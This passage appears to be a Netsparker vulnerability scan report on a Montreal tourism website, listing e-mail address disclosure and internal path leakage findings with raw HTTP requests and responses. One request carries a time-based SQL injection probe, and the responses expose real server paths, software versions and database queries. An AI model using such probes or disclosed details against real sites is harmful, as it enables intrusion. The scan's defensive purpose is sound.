HREF="hotel_xix_siecle_montreal.php">hotel_xix_siecle_mon..&gt;</A> 03-Nov-2006 20:20 18k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hyatt_regency_montreal_montreal.php">hyatt_regency_montre..&gt;</A> 03-Nov-2006 20:20 16k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="l_appartement_hotel_montreal.php">l_appartement_hotel_..&gt;</A> 03-Nov-2006 20:20 20k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="l_hotel_de_la_montagne_montreal.php">l_hotel_de_la_montag..&gt;</A> 03-Nov-2006 20:20 20k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="la_presidence_hotel_and_apartments_montreal.php">la_presidence_hotel_..&gt;</A> 03-Nov-2006 20:20 24k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="la_tour_centre_ville_montreal.php">la_tour_centre_ville..&gt;</A> 03-Nov-2006 20:20 17k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="laval_quebec_canada_hotels.php">laval_quebec_canada_..&gt;</A> 03-Nov-2006 20:20 14k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="le_cantlie_suites_hotel_montreal.php">le_cantlie_suites_ho..&gt;</A> 03-Nov-2006 20:20 20k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="le_centre_sheraton_montreal_hotel_montreal.php">le_centre_sheraton_m..&gt;</A> 03-Nov-2006 20:20 19k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="le_chantecler_hotel_sainte_adele.php">le_chantecler_hotel_..&gt;</A> 03-Nov-2006 20:20 21k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="le_chateau_sainte_adele_sainte_adele.php">le_chateau_sainte_ad..&gt;</A> 03-Nov-2006 20:20 19k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="le_meridien_versailles_montreal.php">le_meridien_versaill..&gt;</A> 03-Nov-2006 20:20 21k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="le_nouvel_hotel_montreal.php">le_nouvel_hotel_mont..&gt;</A> 03-Nov-2006 20:20 21k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="le_square_phillips_hotel_and_suites_montreal.php">le_square_phillips_h..&gt;</A> 03-Nov-2006 20:20 24k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="le_st-martin_hotel_and_suites_laval.php">le_st-martin_hotel_a..&gt;</A> 03-Nov-2006 20:20 20k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="le_st._james_montreal.php">le_st._james_montrea..&gt;</A> 03-Nov-2006 20:20 15k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="loews_hotel_vogue_montreal.php">loews_hotel_vogue_mo..&gt;</A> 03-Nov-2006 20:20 14k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="longueuil_-_days_inn_montreal_south_shore_longueuil.php">longueuil_-_days_inn..&gt;</A> 03-Nov-2006 20:20 16k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="longueuil_quebec_canada_hotels.php">longueuil_quebec_can..&gt;</A> 03-Nov-2006 20:20 7k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="maritime_plaza_hotel_montreal.php">maritime_plaza_hotel..&gt;</A> 03-Nov-2006 20:20 24k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="marriott_montreal_chateau_champlain_montreal.php">marriott_montreal_ch..&gt;</A> 03-Nov-2006 20:20 16k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="montreal-days_inn_midtown_montreal.php">montreal-days_inn_mi..&gt;</A> 03-Nov-2006 20:20 23k <IMG SRC="/icons/folder.gif" ALT="[DIR]"> <A HREF="montreal-days_inn_west/">montreal-days_inn_west/</A> 03-Sep-2007 19:04 - <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="montreal_centre_travelodge_hotel_montreal.php">montreal_centre_trav..&gt;</A> 03-Nov-2006 20:20 23k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="montreal_quebec_canada_hotels.php">montreal_quebec_cana..&gt;</A> 03-Nov-2006 20:21 117k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="montreal_y_hotel_montreal.php">montreal_y_hotel_mon..&gt;</A> 03-Nov-2006 20:21 17k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="nelligan_hotel_montreal.php">nelligan_hotel_montr..&gt;</A> 03-Nov-2006 20:21 23k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="novotel_montreal_center_montreal.php">novotel_montreal_cen..&gt;</A> 03-Nov-2006 20:21 26k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="place_d_armes_hotel_montreal.php">place_d_armes_hotel_..&gt;</A> 03-Nov-2006 20:21 26k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="pointe_claire_quebec_canada_hotels.php">pointe_claire_quebec..&gt;</A> 03-Nov-2006 20:21 7k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="quality_hotel_&amp;_suites_sherbrooke.php">quality..
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /contact.php

/contact.php

http://www.montrealkiosk.com/contact.php

Found E-mails

info@montrealkiosk.com

Request

GET /contact.php HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:20:06 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Contact Montreal Kiosk</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><script type="text/javascript" src="show.js"></script><link href="main.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="http://www.canoe.com/generix/js/generix.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/js/GenFonction.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/TagDfpSection.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/quebec/TagDfpConfig.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/TagDfpEngine.js"></script></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('img/bhome-on.gif','img/bsitemap-on.gif','img/bcontact-on.gif','img/bbookmark-on.gif','img/binfo-on.gif','img/btour-on.gif','img/bevents-on.gif','img/bhotel-on.gif','img/babout-on.gif');runSlideShow()"><iframe height="25" width="100%" src="/canoe.php" scrolling="no" marginwidth="0" framespacing="0" marginheight="0" frameborder="0" allowtransparency="true"></iframe><table width="747" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><img src="img/spc.gif" width="200" height="2"></td> </tr> <tr bgcolor="#333333"> <td width="730" height="92" align="center" valign="middle"><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script><script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:4"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'><" + "/script>");//--></script><noscript><a href='http://www.uberip.com/adserver/adclick.php?n=aae0fd6b' target='_blank'><img src='http://www.uberip.com/adserver/adview.php?what=zone:4&amp;n=aae0fd6b' border='0' alt=''></a></noscript></td> <td width="17"><a href="advertising-rate-card.php"><img src="img/banners/advertising.gif" alt="Montreal Advertising" width="17" height="92" border="0"></a></td> </tr> <tr> <td colspan="2"><img src="img/spc.gif" width="200" height="3"></td> </tr></table><table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="top"> <td height="298" background="img/bg-menu.jpg" width="1600">&nbsp;</td> <td colspan="5" background="img/bg-menu.jpg"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="4"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr valign="top"> <td width="551"><a href="/index.php"><img src="img/montreal.gif" alt="Montreal Kiosk - Your Guide to Montreal, Quebec. Book Montreal Hotel accommodations here... read up on our Montreal Tour Guide and Montreal events." width="551" height="90" border="0"></a></td> <td><a href="index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image2','','img/bhome-on.gif',1)"><img src="img/bhome.gif" alt="Montreal, Quebec" name="Image2" width="41" height="30" border="0"></a><a href="sitemap.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image3','','img/bsitemap-on.gif',1)"><img src="img/bsitemap.gif" alt="Site Map" name="Image3" width="55" height="30" border="0"></a><a href="contact.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image4','','img/bcontact-on.gif',1)"><img src="img/bcontact.gif" alt="Montreal Kiosk Contact Info" name="Image4" width="74" height="30" border="0"></a><a href="javascript:addBookmark('Montreal Kiosk - Your Guide to Montreal, Quebec','http://www.montrealkiosk.com')" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image5','','img/bbookmark-on.gif',1)"><img src="img/bbookmark.gif" alt="Bookmark Montreal Kiosk" name="Image5" width="96" height="30" border="0"></a></td> </tr> </table></td> </tr> <tr> <td width="120"><img src="img/menupic1.jpg" alt="Montreal, Quebec" width="120" height="208"></td> <td width="204" valign="top"><table width="204" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="204" height="29"><a href="index.php#directory" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image7','','img/binfo-on.gif',1)"><img src="img/binfo.gif" alt="Montreal Business Directory" name="Image7" width="204" height="30" border="0"></a><a href="montreal-tour/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image10','','img/btour-on.gif',1)"><img src="img/btour.gif" alt="Montreal Tour Guide" name="Image10" width="204" height="29" border="0"></a><a href="montreal-events/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image11','','img/bevents-on.gif',1)"><img src="img/bevents.gif" alt="Montreal Events" name="Image11" width="204" height="29" border="0"></a><a href="quebec-hotels/montreal_quebec_canada_hotels.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','img/bhotel-on.gif',1)"><img src="img/bhotel.gif" alt="Montreal Hotels" name="Image12" width="204" height="29" border="0"></a><a href="about.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','img/babout-on.gif',1)"><img src="img/babout.gif" alt="About Montreal Kiosk" name="Image13" width="204" height="29" border="0"></a></td> </tr> <tr> <form name="form1" method="post" action=""> <td height="52"> <table width="204" height="52" border="0" cellpadding="0" cellspacing="0" background="img/buttonfiller.gif"> <tr> <td width="31">&nbsp;</td> <td width="173" height="29"> <!-- #BeginLibraryItem "/Library/quicklinks.lbi" --><select name="montreal" class="smalltext" OnChange="location.href=form1.montreal.options[selectedIndex].value"> <option selected>Quick Links <option value="http://www.montrealkiosk.com/montreal-tour/index.php">Montreal Attractions <option value="http://www.montrealkiosk.com/maps/index.php">Map of Montreal <option value="http://www.montrealkiosk.com/weather.php">Montreal Weather <option value="http://www.montrealkiosk.com/quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels <option value="http://www.montrealkiosk.com/advertising.php">Advertising Information <option value="http://www.montrealkiosk.com/contact.php">Contact Us</select><!-- #EndLibraryItem --></td> </tr> <tr> <td height="33" colspan="2" background="img/bg-button.gif">&nbsp;</td> </tr> </table> </td> </form> </tr> </table></td> <td width="493"><img src="img/menupic2.jpg" alt="Montreal, Quebec - A City Full of Life and Culture" name="SlideShow" width="493" height="208" id="SlideShow"></td> <td><img src="img/menupic3.jpg" width="183" height="208"></td> </tr> </table></td> <td background="img/bg-menu.jpg" width="1600">&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td colspan="2" valign="top" background="img/bg-left.gif" class="bgmenu"><table width="314" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="127" valign="top"><table width="127" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="2"><img src="img/spc.gif" width="34" height="5"></td> </tr> <tr> <td width="16">&nbsp;</td> <td><table width="96" border="0" cellpadding="0" cellspacing="0"> <tr> <td><table width="96" height="234" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="22" valign="top"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/weather.gif" alt="Montreal Weather" title="Montreal Weather" width="22" height="206" border="0"></a></td><td width="74" height="206" valign="top" background="http://www.todaysweather.ca/widget_icons/weather/img2/weather-bg.gif"> <table width="74" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/thu.gif" alt="Thursday" title="Thursday"></td> </tr> <tr> <td height="60" align="center"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons//weather/03.gif" alt="Cloudy with sunny periods" title="Cloudy with sunny periods" border="0"></a></td> </tr> <tr> <td height="19" align="center" style="font-size: 10px; font-weight: bold; color: #ffffff; font-family: Arial,Helvetica,sans-serif;">-7&deg;C</td> </tr> <tr> <td align="center"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/fri.gif" alt="Friday" title="Friday"></td> </tr> <tr> <td height="60" align="center"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons//weather/02.gif" alt="A mix of sun and cloud" title="A mix of sun and cloud" border="0"></a></td> </tr> <tr> <td height="19" align="center" style="font-size: 10px; font-weight: bold; color: #ffffff; font-family: Arial,Helvetica,sans-serif;">-8&deg;C</td> </tr> </table> </td> </tr> <tr> <td colspan="2" style="font-family: Arial,Helvetica,sans-serif; font-size: 10px; color: #333333;" align="center" valign="middle" background="http://www.todaysweather.ca/widget_icons/weather/img2/weather-datebg.gif">Thu, Jan 13th</td> </tr> </table> <br><br><br> </td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td><a href="http://www.montrealatnight.ca" target="_blank"><img src="img/banners/atnight.gif" alt="Montreal Nightlife Guide and Adult Directory" width="96" height="47" border="0"></a></td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td></td> </tr> </table></td> </tr> </table></td> <td width="187" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><img src="img/titlearrow.gif" width="22" height="22"></td> <td><img src="img/spc.gif" width="4" height="10"></td> <td><nobr class="maintitle">Contact Menu</nobr></td> <td><img src="img/spc.gif" width="8" height="10"></td> <td width="1600" bgcolor="#CCCCCC">&nbsp;</td> </tr> <tr> <td colspan="5"><img src="img/spc.gif" width="100" height="3"></td> </tr> </table> <table width="100%" border="0" cellspacing="3" cellpadding="3"> <tr> <td><img src="img/arrow.gif" alt="" width="10" height="10" hspace="3"><a href="advertising.php">Advertising Information </a></td> </tr> <tr> <td><img src="img/arrow.gif" alt="" width="10" height="10" hspace="3"><a href="about.php">About Montreal Kiosk</a></td> </tr> <tr> <td><img src="img/arrow.gif" alt="" width="10" height="10" hspace="3"><a href="link.php">Link To Us</a></td> </tr> </table></td> </tr> <tr> <td colspan="2" align="right" valign="top" bgcolor="#FFFFFF"><table width="314" height="260" border="0" cellpadding="1" cellspacing="0"> <tr> <td width="14">&nbsp;</td> <td width="300"><table width="300" height="250" border="0" cellpadding="0" cellspacing="0"> <tr> <td><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script> <script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:260"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'><" + "/script>");//--> </script> <noscript> <a href='http://www.uberip.com/adserver/adclick.php?n=a4793d70' target='_blank'><img src='http://www.uberip.com/adserver/adview.php?what=zone:260&amp;n=a4793d70' border='0' alt=''></a> </noscript> </td> </tr> </table></td> </tr> </table></td> </tr> <..
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)

3 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /directory.php

/directory.php

http://www.montrealkiosk.com/directory.php?name=Arts%20&%20Entertainment='%3BSELECT%20pg_sleep(25)--..

Identified Internal Path(s)

/home/montreak/public_html/adodb/drivers/adodb-mysql.inc.php

Request

GET /directory.php?name=Arts%20&%20Entertainment='%3BSELECT%20pg_sleep(25)--&categoryId=166 HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:22:09 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


<br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/montreak/public_html/adodb/drivers/adodb-mysql.inc.php</b> on line <b>355</b><br />mysql error: [1040: Too many connections] in EXECUTE("SELECT * FROM category WHERE category_id = '166'")<pre align=left> &nbsp; <font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM category WHERE category_id = '166', false)</font><font color=#808080 size=-1> % line 1414, file: <a href="file://home/montreak/public_html/adodb/adodb.inc.php">adodb.inc.php</a></font><font face="Courier New,Courier">ADOConnection.GetRow(SELECT * FROM category WHERE category_id = '166')</font><font color=#808080 size=-1> % line 22, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getCategory(166)</font><font color=#808080 size=-1> % line 125, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
- /quebec-hotels/montreal-days_inn_west/international_airport_montreal.php

/quebec-hotels/montreal-days_inn_west/international_airport_montreal.php

http://www.montrealkiosk.com/quebec-hotels/montreal-days_inn_west/international_airport_montreal.php

Identified Internal Path(s)

  • /home/montreak/public_html/content_includes/footer.php
  • /home/montreak/public_html/

Request

GET /quebec-hotels/montreal-days_inn_west/international_airport_montreal.php HTTP/1.1
Referer: http://www.montrealkiosk.com/quebec-hotels/montreal_quebec_canada_hotels.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:25:05 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Montreal-Days Inn West/International Airport - Montreal Hotels - Montreal-Days Inn West/International Airport - Montreal Hotels and Accommodations Guide</title><meta name="keywords" content="Montreal hotel, Montreal hotels, Montreal, Quebec, Quebec hotels"><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><script type="text/javascript" src="/javascript.js"></script><script type="text/javascript" src="/show.js"></script><link href="/main.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="http://www.canoe.com/generix/js/generix.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/js/GenFonction.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/TagDfpSection.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/quebec/TagDfpConfig.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/TagDfpEngine.js"></script></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('/img/bhome-on.gif','/img/bsitemap-on.gif','/img/bcontact-on.gif','/img/bbookmark-on.gif','/img/binfo-on.gif','/img/btour-on.gif','/img/bevents-on.gif','/img/bhotel-on.gif','/img/babout-on.gif');runSlideShow()"><table width="747" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><img src="/img/spc.gif" width="200" height="2"></td> </tr> <tr bgcolor="#333333"> <td width="730" height="92" align="center" valign="middle"><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script><script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:4"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'><" + "/script>");//--></script><noscript><a href='http://www.uberip.com/adserver/adclick.php?n=aae0fd6b' target='_blank'><img src='http://www.uberip.com/adserver/adview.php?what=zone:4&amp;n=aae0fd6b' border='0' alt=''></a></noscript></td> <td width="17"><a href="/advertising-rate-card.php"><img src="/img/banners/advertising.gif" alt="Montreal Advertising" width="17" height="92" border="0"></a></td> </tr> <tr> <td colspan="2"><img src="/img/spc.gif" width="200" height="3"></td> </tr></table><table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="top"> <td height="298" background="/img/bg-menu.jpg" width="1600">&nbsp;</td> <td colspan="5" background="/img/bg-menu.jpg"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="4"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr valign="top"> <td width="551"><a href="/index.php"><img src="/img/montreal.gif" alt="Montreal Kiosk - Your Guide to Montreal, Quebec. Book Montreal Hotel accommodations here... read up on our Montreal Tour Guide and Montreal events." width="551" height="90" border="0"></a></td> <td><a href="/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image2','','/img/bhome-on.gif',1)"><img src="/img/bhome.gif" alt="Montreal, Quebec" name="Image2" width="41" height="30" border="0"></a><a href="/sitemap.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image3','','/img/bsitemap-on.gif',1)"><img src="/img/bsitemap.gif" alt="Site Map" name="Image3" width="55" height="30" border="0"></a><a href="/contact.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image4','','/img/bcontact-on.gif',1)"><img src="/img/bcontact.gif" alt="Montreal Kiosk Contact Info" name="Image4" width="74" height="30" border="0"></a><a href="javascript:addBookmark('Montreal Kiosk - Your Guide to Montreal, Quebec','http://www.montrealkiosk.com')" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image5','','/img/bbookmark-on.gif',1)"><img src="/img/bbookmark.gif" alt="Bookmark Montreal Kiosk" name="Image5" width="96" height="30" border="0"></a></td> </tr> </table></td> </tr> <tr> <td width="120"><img src="/img/menupic1.jpg" width="120" height="208"></td> <td width="204" valign="top"><table width="204" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="204" height="29"><a href="/index.php#directory" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image7','','/img/binfo-on.gif',1)"><img src="/img/binfo.gif" alt="Montreal Business Directory" name="Image7" width="204" height="30" border="0"></a><a href="/montreal-tour/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image10','','/img/btour-on.gif',1)"><img src="/img/btour.gif" alt="Montreal Tour Guide" name="Image10" width="204" height="29" border="0"></a><a href="/montreal-events/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image11','','/img/bevents-on.gif',1)"><img src="/img/bevents.gif" alt="Montreal Events" name="Image11" width="204" height="29" border="0"></a><a href="/quebec-hotels/montreal_quebec_canada_hotels.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','/img/bhotel-on.gif',1)"><img src="/img/bhotel.gif" alt="Montreal Hotels" name="Image12" width="204" height="29" border="0"></a><a href="/about.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','/img/babout-on.gif',1)"><img src="/img/babout.gif" alt="About Montreal Kiosk" name="Image13" width="204" height="29" border="0"></a></td> </tr> <tr> <form name="form1" method="post" action=""> <td height="52"> <table width="204" height="52" border="0" cellpadding="0" cellspacing="0" background="/img/buttonfiller.gif"> <tr> <td width="31">&nbsp;</td> <td width="173" height="29"><!-- #BeginLibraryItem "/Library/quicklinks.lbi" --><select name="montreal" class="smalltext" OnChange="location.href=form1.montreal.options[selectedIndex].value"> <option selected>Quick Links <option value="http://www.montrealkiosk.com/montreal-tour/index.php">Montreal Attractions <option value="http://www.montrealkiosk.com/maps/index.php">Map of Montreal <option value="http://www.montrealkiosk.com/weather.php">Montreal Weather <option value="http://www.montrealkiosk.com/quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels <option value="http://www.montrealkiosk.com/advertising.php">Advertising Information <option value="http://www.montrealkiosk.com/contact.php">Contact Us</select><!-- #EndLibraryItem --></td> </tr> <tr> <td height="33" colspan="2" background="/img/bg-button.gif">&nbsp;</td> </tr> </table> </td> </form> </tr> </table></td> <td width="493"><img src="/img/menupic2.jpg" alt="Montreal, Quebec - A City Full of Life and Culture" name="SlideShow" width="493" height="208" id="SlideShow"></td> <td><img src="/img/menupic3.jpg" width="183" height="208"></td> </tr> </table></td> <td background="/img/bg-menu.jpg" width="1600">&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td width="127" rowspan="3" valign="top" background="/img/bg-left.gif"><img src="/img/bg-left.gif" width="127" height="36"></td> <td width="187" rowspan="2" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><img src="/img/titlearrow.gif" width="22" height="22"></td> <td><img src="/img/spc.gif" width="4" height="10"></td> <td><NOBR class="maintitle">Quebec Hotels</NOBR></td> <td><img src="/img/spc.gif" width="8" height="10"></td> <td width="1600" bgcolor="#CCCCCC">&nbsp;</td> </tr> <tr> <td colspan="5"><img src="/img/spc.gif" width="100" height="3"></td> </tr> </table> <table width="100%" border="0" cellspacing="3" cellpadding="3"> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/blainville_quebec_canada_hotels.php" class="tourism">Blainville Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/boucherville_quebec_canada_hotels.php" class="tourism">Boucherville Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/dorval_quebec_canada_hotels.php" class="tourism">Dorval Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/laval_quebec_canada_hotels.php" class="tourism">Laval Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/longueuil_quebec_canada_hotels.php" class="tourism">Longueuil Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/montreal_quebec_canada_hotels.php" class="tourism">Montreal Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/pointe_claire_quebec_canada_hotels.php" class="tourism">Pointe Claire Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/saint_jean_sur_richelieu_quebec_canada_hotels.php" class="tourism">Saint Jean Sur Richelieu Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/sainte_adele_quebec_canada_hotels.php" class="tourism">Sainte Adele Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a 